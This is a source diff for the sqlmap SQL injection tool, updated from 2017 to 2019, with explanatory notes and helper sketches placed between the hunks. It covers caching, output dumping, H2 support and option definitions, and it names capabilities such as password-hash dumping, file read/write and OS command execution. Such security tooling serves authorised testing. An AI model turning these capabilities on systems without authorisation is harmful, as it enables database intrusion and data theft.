||||||
|
|
||||||
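Note: the hunks above switch BigArray's on-disk chunk format from zlib to bz2. A minimal stand-alone sketch of that round-trip, assuming only the standard library; the BIGARRAY_COMPRESS_LEVEL value of 9 and the temp-file prefix are illustrative assumptions, not necessarily sqlmap's own settings:

import bz2
import os
import pickle
import tempfile

BIGARRAY_COMPRESS_LEVEL = 9  # assumed value, for illustration only

def dump_chunk(chunk):
    # compress a pickled chunk into a temporary file (roughly what _dump() does)
    handle, filename = tempfile.mkstemp(prefix="bigarray-")
    os.close(handle)
    with open(filename, "w+b") as f:
        f.write(bz2.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL))
    return filename

def load_chunk(filename):
    # inverse operation (roughly what _checkcache() does when refilling the cache)
    with open(filename, "rb") as f:
        return pickle.loads(bz2.decompress(f.read()))

assert load_chunk(dump_chunk(list(range(100)))) == list(range(100))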
File diff suppressed because it is too large
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

@@ -80,7 +80,7 @@ def base64unpickle(value, unsafe=False):
if len(self.stack) > 1:
func = self.stack[-2]
if func not in PICKLE_REDUCE_WHITELIST:
-raise Exception, "abusing reduce() is bad, Mkay!"
+raise Exception("abusing reduce() is bad, Mkay!")
self.load_reduce()

def loads(str):
@@ -174,7 +174,7 @@ def htmlunescape(value):
pass
return retVal

-def singleTimeWarnMessage(message):  # Cross-linked function
+def singleTimeWarnMessage(message):  # Cross-referenced function
sys.stdout.write(message)
sys.stdout.write("\n")
sys.stdout.flush()
@@ -193,7 +193,7 @@ def stdoutencode(data):
warnMsg = "cannot properly display Unicode characters "
warnMsg += "inside Windows OS command prompt "
warnMsg += "(http://bugs.python.org/issue1602). All "
-warnMsg += "unhandled occurances will result in "
+warnMsg += "unhandled occurrences will result in "
warnMsg += "replacement with '?' character. Please, find "
warnMsg += "proper character representation inside "
warnMsg += "corresponding output files. "
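Note: the PICKLE_REDUCE_WHITELIST check above guards reduce()-based pickle gadgets during unsafe unpickling. A related (but not identical) way to express the same idea on Python 3 is to restrict find_class instead; the whitelist content here is purely illustrative:

import io
import pickle

ALLOWED = {("builtins", "set")}  # illustrative whitelist, not sqlmap's

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # refuse any global outside the explicit whitelist
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError("forbidden global %s.%s" % (module, name))
        return super(RestrictedUnpickler, self).find_class(module, name)

def loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

print(loads(pickle.dumps({1, 2, 3})))   # allowed, builtins.set is whitelisted
# loads(pickle.dumps(object))           # would raise UnpicklingError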
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -1,13 +1,15 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import copy
import types

+from thirdparty.odict.odict import OrderedDict
+
class AttribDict(dict):
"""
This class defines the sqlmap object, inheriting from Python data
@@ -104,3 +106,40 @@ class InjectionDict(AttribDict):
self.dbms = None
self.dbms_version = None
self.os = None

+# Reference: https://www.kunxi.org/2014/05/lru-cache-in-python
+class LRUDict(object):
+def __init__(self, capacity):
+self.capacity = capacity
+self.cache = OrderedDict()
+
+def __len__(self):
+return len(self.cache)
+
+def __contains__(self, key):
+return key in self.cache
+
+def __getitem__(self, key):
+try:
+value = self.cache.pop(key)
+self.cache[key] = value
+return value
+except KeyError:
+return -1
+
+def get(self, key):
+return self.__getitem__(self, key)
+
+def __setitem__(self, key, value):
+try:
+self.cache.pop(key)
+except KeyError:
+if len(self.cache) >= self.capacity:
+self.cache.popitem(last=False)
+self.cache[key] = value
+
+def set(self, key, value):
+self.__setitem__(key, value)
+
+def keys(self):
+return self.cache.keys()
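Note: a brief usage sketch of the least-recently-used eviction the new LRUDict provides. This stand-alone version is built on collections.OrderedDict rather than the bundled thirdparty module and condenses the class, purely for illustration:

from collections import OrderedDict

class LRUDict(object):
    def __init__(self, capacity):
        self.capacity = capacity
        self.cache = OrderedDict()

    def __setitem__(self, key, value):
        # re-inserting moves the key to the "most recently used" end
        self.cache.pop(key, None)
        if len(self.cache) >= self.capacity:
            self.cache.popitem(last=False)  # evict the least recently used entry
        self.cache[key] = value

    def __getitem__(self, key):
        value = self.cache.pop(key)
        self.cache[key] = value
        return value

lru = LRUDict(capacity=2)
lru["a"], lru["b"] = 1, 2
lru["a"]        # touching "a" makes "b" the eviction candidate
lru["c"] = 3    # evicts "b"
assert "b" not in lru.cache and "a" in lru.cache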
@@ -1,27 +1,54 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

-def cachedmethod(f, cache={}):
+import functools
+import hashlib
+import threading
+
+from lib.core.settings import MAX_CACHE_ITEMS
+from lib.core.datatype import LRUDict
+from lib.core.threads import getCurrentThreadData
+
+_lock = threading.Lock()
+
+def cachedmethod(f, cache=LRUDict(capacity=MAX_CACHE_ITEMS)):
"""
Method with a cached content

Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
"""

+@functools.wraps(f)
def _(*args, **kwargs):
-try:
-key = hash((f, tuple(args), frozenset(kwargs.items())))
-if key not in cache:
-cache[key] = f(*args, **kwargs)
-except:
-key = hash("".join(str(_) for _ in (f, args, kwargs)))
+with _lock:
+key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs))).hexdigest(), 16) & 0x7fffffffffffffff
if key not in cache:
cache[key] = f(*args, **kwargs)

return cache[key]

+return _
+
+def stackedmethod(f):
+"""
+Method using pushValue/popValue functions (fallback function for stack realignment)
+"""
+
+@functools.wraps(f)
+def _(*args, **kwargs):
+threadData = getCurrentThreadData()
+originalLevel = len(threadData.valueStack)
+
+try:
+result = f(*args, **kwargs)
+finally:
+if len(threadData.valueStack) > originalLevel:
+threadData.valueStack = threadData.valueStack[:originalLevel]
+
+return result
+
return _
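Note: a self-contained sketch of the memoisation pattern the rewritten cachedmethod uses (md5-derived key computed under a lock, result stored in a cache mapping). A plain dict stands in for the bounded LRUDict, and call_count is only a demo counter; the .encode() call is needed on Python 3:

import functools
import hashlib
import threading

_lock = threading.Lock()

def cachedmethod(f, cache={}):
    @functools.wraps(f)
    def _(*args, **kwargs):
        with _lock:
            key = int(hashlib.md5("|".join(str(v) for v in (f, args, kwargs)).encode("utf8")).hexdigest(), 16) & 0x7fffffffffffffff
            if key not in cache:
                cache[key] = f(*args, **kwargs)
        return cache[key]
    return _

call_count = [0]

@cachedmethod
def slow_square(x):
    call_count[0] += 1
    return x * x

assert slow_square(4) == 16 and slow_square(4) == 16
assert call_count[0] == 1  # the second call was served from the cache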
@@ -1,27 +1,27 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.datatype import AttribDict

_defaults = {
"csvDel": ',',
"timeSec": 5,
"googlePage": 1,
"verbose": 1,
"delay": 0,
"timeout": 30,
"retries": 3,
"saFreq": 0,
"threads": 1,
"level": 1,
"risk": 1,
"dumpFormat": "CSV",
"tech": "BEUSTQ",
"torType": "SOCKS5",
}

defaults = AttribDict(_defaults)
@@ -1,10 +1,11 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

+from lib.core.enums import CONTENT_TYPE
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.enums import POST_HINT
@@ -21,6 +22,7 @@ from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQLDB_ALIASES
+from lib.core.settings import H2_ALIASES
from lib.core.settings import INFORMIX_ALIASES

FIREBIRD_TYPES = {
@@ -184,16 +186,17 @@ DUMP_REPLACEMENTS = {" ": NULL, "": BLANK}

DBMS_DICT = {
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"),
-DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
+DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/PyMySQL/PyMySQL", "mysql"),
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
-DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
+DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "https://oracle.github.io/python-cx_Oracle/", "oracle"),
-DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
+DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "https://docs.python.org/2/library/sqlite3.html", "sqlite"),
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"),
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"),
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
+DBMS.H2: (H2_ALIASES, None, None, None),
DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
}

@@ -208,54 +211,64 @@ FROM_DUMMY_TABLE = {
}

SQL_STATEMENTS = {
"SQL SELECT statement": (
"select ",
"show ",
" top ",
" distinct ",
" from ",
" from dual",
" where ",
" group by ",
" order by ",
" having ",
" limit ",
" offset ",
" union all ",
" rownum as ",
-"(case ", ),
+"(case ",
+),

"SQL data definition": (
"create ",
"declare ",
"drop ",
"truncate ",
-"alter ", ),
+"alter ",
+),

"SQL data manipulation": (
"bulk ",
"insert ",
"update ",
"delete ",
"merge ",
-"load ", ),
+"load ",
+),

"SQL data control": (
"grant ",
-"revoke ", ),
+"revoke ",
+),

"SQL data execution": (
"exec ",
"execute ",
"values ",
-"call ", ),
+"call ",
+),

"SQL transaction": (
"start transaction ",
"begin work ",
"begin transaction ",
"commit ",
-"rollback ", ),
+"rollback ",
+),
+
+"SQL administration": (
+"set ",
+),
}

POST_HINT_CONTENT_TYPES = {
@@ -273,6 +286,8 @@ DEPRECATED_OPTIONS = {
"--binary": "use '--binary-fields' instead",
"--auth-private": "use '--auth-file' instead",
"--ignore-401": "use '--ignore-code' instead",
+"--second-order": "use '--second-url' instead",
+"--purge-output": "use '--purge' instead",
"--check-payload": None,
"--check-waf": None,
"--pickled-options": "use '--api -c ...' instead",
@@ -287,3 +302,31 @@ DEFAULT_DOC_ROOTS = {
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www")  # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
}
+
+PART_RUN_CONTENT_TYPES = {
+"checkDbms": CONTENT_TYPE.TECHNIQUES,
+"getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
+"getBanner": CONTENT_TYPE.BANNER,
+"getCurrentUser": CONTENT_TYPE.CURRENT_USER,
+"getCurrentDb": CONTENT_TYPE.CURRENT_DB,
+"getHostname": CONTENT_TYPE.HOSTNAME,
+"isDba": CONTENT_TYPE.IS_DBA,
+"getUsers": CONTENT_TYPE.USERS,
+"getPasswordHashes": CONTENT_TYPE.PASSWORDS,
+"getPrivileges": CONTENT_TYPE.PRIVILEGES,
+"getRoles": CONTENT_TYPE.ROLES,
+"getDbs": CONTENT_TYPE.DBS,
+"getTables": CONTENT_TYPE.TABLES,
+"getColumns": CONTENT_TYPE.COLUMNS,
+"getSchema": CONTENT_TYPE.SCHEMA,
+"getCount": CONTENT_TYPE.COUNT,
+"dumpTable": CONTENT_TYPE.DUMP_TABLE,
+"search": CONTENT_TYPE.SEARCH,
+"sqlQuery": CONTENT_TYPE.SQL_QUERY,
+"tableExists": CONTENT_TYPE.COMMON_TABLES,
+"columnExists": CONTENT_TYPE.COMMON_COLUMNS,
+"readFile": CONTENT_TYPE.FILE_READ,
+"writeFile": CONTENT_TYPE.FILE_WRITE,
+"osCmd": CONTENT_TYPE.OS_CMD,
+"regRead": CONTENT_TYPE.REG_READ
+}
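Note: the DBMS_DICT entries above keep a fixed tuple layout (aliases, dependency package, download URL, SQLAlchemy dialect), with None marking the slots a backend such as H2 does not provide. A hedged sketch of consuming that layout, using a stand-in dictionary with made-up alias tuples since the real table lives in lib/core/dicts.py:

# stand-in with the same 4-tuple layout as DBMS_DICT
DBMS_DICT = {
    "MySQL": (("mysql", "mariadb"), "python-pymysql", "https://github.com/PyMySQL/PyMySQL", "mysql"),
    "H2": (("h2",), None, None, None),
}

def dependency_hint(dbms):
    aliases, module, url, dialect = DBMS_DICT[dbms]
    if module is None:
        return "no direct connector available for %s" % dbms
    return "install %s (%s)" % (module, url)

print(dependency_hint("MySQL"))
print(dependency_hint("H2"))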
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

@@ -20,6 +20,7 @@ from lib.core.common import dataToStdout
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import isListLike
+from lib.core.common import isMultiThreadMode
from lib.core.common import normalizeUnicode
from lib.core.common import openFile
from lib.core.common import prioritySortColumns
@@ -46,6 +47,8 @@ from lib.core.settings import METADB_SUFFIX
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
from lib.core.settings import UNICODE_ENCODING
+from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT
+from lib.core.settings import VERSION_STRING
from lib.core.settings import WINDOWS_RESERVED_NAMES
from thirdparty.magic import magic

@@ -72,16 +75,17 @@ class Dump(object):
if console:
dataToStdout(text)

-if kb.get("multiThreadMode"):
+multiThreadMode = isMultiThreadMode()
+if multiThreadMode:
self._lock.acquire()

try:
self._outputFP.write(text)
-except IOError, ex:
+except IOError as ex:
errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex)
raise SqlmapGenericException(errMsg)

-if kb.get("multiThreadMode"):
+if multiThreadMode:
self._lock.release()

kb.dataOutputFlag = True
@@ -97,7 +101,7 @@ class Dump(object):
self._outputFile = os.path.join(conf.outputPath, "log")
try:
self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
-except IOError, ex:
+except IOError as ex:
errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex)
raise SqlmapGenericException(errMsg)

@@ -108,8 +112,6 @@ class Dump(object):
self._write(data, content_type=content_type)

def string(self, header, data, content_type=None, sort=True):
-kb.stickyLevel = None
-
if conf.api:
self._write(data, content_type=content_type)
return
@@ -140,7 +142,7 @@ class Dump(object):
try:
elements = set(elements)
elements = list(elements)
-elements.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
+elements.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)
except:
pass

@@ -169,7 +171,7 @@ class Dump(object):
def currentDb(self, data):
if Backend.isDbms(DBMS.MAXDB):
self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
-elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB):
+elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2):
self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
else:
self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)
@@ -191,7 +193,7 @@ class Dump(object):
userSettings = userSettings[0]

users = userSettings.keys()
-users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
+users.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)

if conf.api:
self._write(userSettings, content_type=content_type)
@@ -285,7 +287,7 @@ class Dump(object):
colType = None

colList = columns.keys()
-colList.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
+colList.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)

for column in colList:
colType = columns[column]
@@ -377,7 +379,7 @@ class Dump(object):
if count is None:
count = "Unknown"

-tables.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
+tables.sort(key=lambda _: _.lower() if isinstance(_, basestring) else _)

for table in tables:
blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or unicode(table)))
@@ -414,20 +416,20 @@ class Dump(object):
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
if not os.path.isdir(dumpDbPath):
try:
-os.makedirs(dumpDbPath, 0755)
+os.makedirs(dumpDbPath)
except:
warnFile = True

-_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
+_ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db)))
dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))

if not os.path.isdir(dumpDbPath):
try:
-os.makedirs(dumpDbPath, 0755)
-except Exception, ex:
+os.makedirs(dumpDbPath)
+except Exception as ex:
try:
tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
-except IOError, _:
+except IOError as _:
errMsg = "unable to write to the temporary directory ('%s'). " % _
errMsg += "Please make sure that your disk is not full and "
errMsg += "that you have sufficient write permissions to "
@@ -441,7 +443,7 @@ class Dump(object):

dumpDbPath = tempDir

-dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
+dumpFileName = os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())))
if not checkFile(dumpFileName, False):
try:
openFile(dumpFileName, "w+b").close()
@@ -450,9 +452,9 @@ class Dump(object):
except:
warnFile = True

-_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
+_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
-_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
+_ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table)))
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
else:
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
@@ -531,6 +533,7 @@ class Dump(object):
elif conf.dumpFormat == DUMP_FORMAT.HTML:
dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
+dataToDumpFile(dumpFP, "<meta name=\"generator\" content=\"%s\" />\n" % VERSION_STRING)
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")
@@ -611,9 +614,9 @@ class Dump(object):
mimetype = magic.from_buffer(value, mime=True)
if any(mimetype.startswith(_) for _ in ("application", "image")):
if not os.path.isdir(dumpDbPath):
-os.makedirs(dumpDbPath, 0755)
+os.makedirs(dumpDbPath)

-_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
+_ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8)))
warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
logger.warn(warnMsg)
@@ -621,8 +624,8 @@ class Dump(object):
with open(filepath, "wb") as f:
_ = safechardecode(value, True)
f.write(_)
-except magic.MagicException, err:
-logger.debug(str(err))
+except magic.MagicException as ex:
+logger.debug(getSafeExString(ex))

if conf.dumpFormat == DUMP_FORMAT.CSV:
if field == fields:
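Note: several hunks above replace a hard-coded "_" with UNSAFE_DUMP_FILEPATH_REPLACEMENT when building dump file names, and fall back to a hash-suffixed name when the identifier had to be sanitised. A minimal sketch of that idea, assuming the replacement character is "_" (the constant's real value is defined in lib/core/settings.py) and using a slightly simpler trigger condition than dump.py:

import hashlib
import re

UNSAFE_DUMP_FILEPATH_REPLACEMENT = '_'  # assumed value, for illustration only

def safe_dump_name(identifier, suffix="csv"):
    # replace anything that is not a word character (path separators included)
    cleaned = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, identifier)
    if cleaned != identifier:
        # disambiguate sanitised names with a short hash of the original identifier
        digest = hashlib.md5(identifier.encode("utf8")).hexdigest()[:8]
        return "%s-%s.%s" % (cleaned, digest, suffix)
    return "%s.%s" % (cleaned, suffix)

print(safe_dump_name("users"))              # users.csv
print(safe_dump_name("users;drop table"))   # users_drop_table-<md5 prefix>.csv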
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

@@ -22,6 +22,15 @@ class SORT_ORDER:
FIFTH = 4
LAST = 100

+# Reference: https://docs.python.org/2/library/logging.html#logging-levels
+class LOGGING_LEVELS:
+NOTSET = 0
+DEBUG = 10
+INFO = 20
+WARNING = 30
+ERROR = 40
+CRITICAL = 50
+
class DBMS:
ACCESS = "Microsoft Access"
DB2 = "IBM DB2"
@@ -34,6 +43,7 @@ class DBMS:
SQLITE = "SQLite"
SYBASE = "Sybase"
HSQLDB = "HSQLDB"
+H2 = "H2"
INFORMIX = "Informix"

class DBMS_DIRECTORY_NAME:
@@ -48,6 +58,7 @@ class DBMS_DIRECTORY_NAME:
SQLITE = "sqlite"
SYBASE = "sybase"
HSQLDB = "hsqldb"
+H2 = "h2"
INFORMIX = "informix"

class CUSTOM_LOGGING:
@@ -233,40 +244,42 @@ class REDIRECTION:

class PAYLOAD:
SQLINJECTION = {
1: "boolean-based blind",
2: "error-based",
3: "inline query",
4: "stacked queries",
5: "AND/OR time-based blind",
6: "UNION query",
}

PARAMETER = {
1: "Unescaped numeric",
2: "Single quoted string",
3: "LIKE single quoted string",
4: "Double quoted string",
5: "LIKE double quoted string",
+6: "Identifier (e.g. column name)",
}

RISK = {
0: "No risk",
1: "Low risk",
2: "Medium risk",
3: "High risk",
}

CLAUSE = {
0: "Always",
1: "WHERE",
2: "GROUP BY",
3: "ORDER BY",
4: "LIMIT",
5: "OFFSET",
6: "TOP",
7: "Table name",
8: "Column name",
+9: "Pre-WHERE (non-query)",
}

class METHOD:
COMPARISON = "comparison"
@@ -297,7 +310,7 @@ class ADJUST_TIME_DELAY:
NO = 0
YES = 1

-class WEB_API:
+class WEB_PLATFORM:
PHP = "php"
ASP = "asp"
ASPX = "aspx"
@@ -331,34 +344,6 @@ class CONTENT_TYPE:
OS_CMD = 24
REG_READ = 25

-PART_RUN_CONTENT_TYPES = {
-"checkDbms": CONTENT_TYPE.TECHNIQUES,
-"getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
-"getBanner": CONTENT_TYPE.BANNER,
-"getCurrentUser": CONTENT_TYPE.CURRENT_USER,
-"getCurrentDb": CONTENT_TYPE.CURRENT_DB,
-"getHostname": CONTENT_TYPE.HOSTNAME,
-"isDba": CONTENT_TYPE.IS_DBA,
-"getUsers": CONTENT_TYPE.USERS,
-"getPasswordHashes": CONTENT_TYPE.PASSWORDS,
-"getPrivileges": CONTENT_TYPE.PRIVILEGES,
-"getRoles": CONTENT_TYPE.ROLES,
-"getDbs": CONTENT_TYPE.DBS,
-"getTables": CONTENT_TYPE.TABLES,
-"getColumns": CONTENT_TYPE.COLUMNS,
-"getSchema": CONTENT_TYPE.SCHEMA,
-"getCount": CONTENT_TYPE.COUNT,
-"dumpTable": CONTENT_TYPE.DUMP_TABLE,
-"search": CONTENT_TYPE.SEARCH,
-"sqlQuery": CONTENT_TYPE.SQL_QUERY,
-"tableExists": CONTENT_TYPE.COMMON_TABLES,
-"columnExists": CONTENT_TYPE.COMMON_COLUMNS,
-"readFile": CONTENT_TYPE.FILE_READ,
-"writeFile": CONTENT_TYPE.FILE_WRITE,
-"osCmd": CONTENT_TYPE.OS_CMD,
-"regRead": CONTENT_TYPE.REG_READ
-}

class CONTENT_STATUS:
IN_PROGRESS = 0
COMPLETE = 1
@@ -373,6 +358,7 @@ class AUTOCOMPLETE_TYPE:
SQL = 0
OS = 1
SQLMAP = 2
+API = 3

class NOTE:
FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable"
@@ -392,3 +378,7 @@ class TIMEOUT_STATE:
NORMAL = 0
EXCEPTION = 1
TIMEOUT = 2
+
+class HINT:
+PREPEND = 0
+APPEND = 1
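Note: the new LOGGING_LEVELS class simply mirrors the numeric levels of the standard logging module, so the two stay interchangeable; a quick check:

import logging

class LOGGING_LEVELS:
    NOTSET = 0
    DEBUG = 10
    INFO = 20
    WARNING = 30
    ERROR = 40
    CRITICAL = 50

assert LOGGING_LEVELS.WARNING == logging.WARNING
logging.getLogger("demo").setLevel(LOGGING_LEVELS.DEBUG)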
@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

@@ -1,7 +1,7 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
File diff suppressed because it is too large
@@ -1,255 +1,259 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

optDict = {
-# Format:
-# Family: { "parameter name": "parameter datatype" },
-# Or:
-# Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") },
+# Family: {"parameter name": "parameter datatype"},
+# --OR--
+# Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")},

"Target": {
"direct": "string",
"url": "string",
"logFile": "string",
"bulkFile": "string",
"requestFile": "string",
"sessionFile": "string",
"googleDork": "string",
"configFile": "string",
"sitemapUrl": "string",
},

"Request": {
"method": "string",
"data": "string",
"paramDel": "string",
"cookie": "string",
"cookieDel": "string",
"loadCookies": "string",
"dropSetCookie": "boolean",
"agent": "string",
"randomAgent": "boolean",
"host": "string",
"referer": "string",
"headers": "string",
"authType": "string",
"authCred": "string",
"authFile": "string",
"ignoreCode": "integer",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
"ignoreTimeouts": "boolean",
"proxy": "string",
"proxyCred": "string",
"proxyFile": "string",
"tor": "boolean",
"torPort": "integer",
"torType": "string",
"checkTor": "boolean",
"delay": "float",
"timeout": "float",
"retries": "integer",
"rParam": "string",
"safeUrl": "string",
"safePost": "string",
"safeReqFile": "string",
"safeFreq": "integer",
"skipUrlEncode": "boolean",
"csrfToken": "string",
"csrfUrl": "string",
"forceSSL": "boolean",
"hpp": "boolean",
"evalCode": "string",
},

"Optimization": {
"optimize": "boolean",
"predictOutput": "boolean",
"keepAlive": "boolean",
"nullConnection": "boolean",
"threads": "integer",
},

"Injection": {
"testParameter": "string",
"skip": "string",
"skipStatic": "boolean",
"paramExclude": "string",
"dbms": "string",
"dbmsCred": "string",
"os": "string",
"invalidBignum": "boolean",
"invalidLogical": "boolean",
"invalidString": "boolean",
"noCast": "boolean",
"noEscape": "boolean",
"prefix": "string",
"suffix": "string",
"tamper": "string",
},

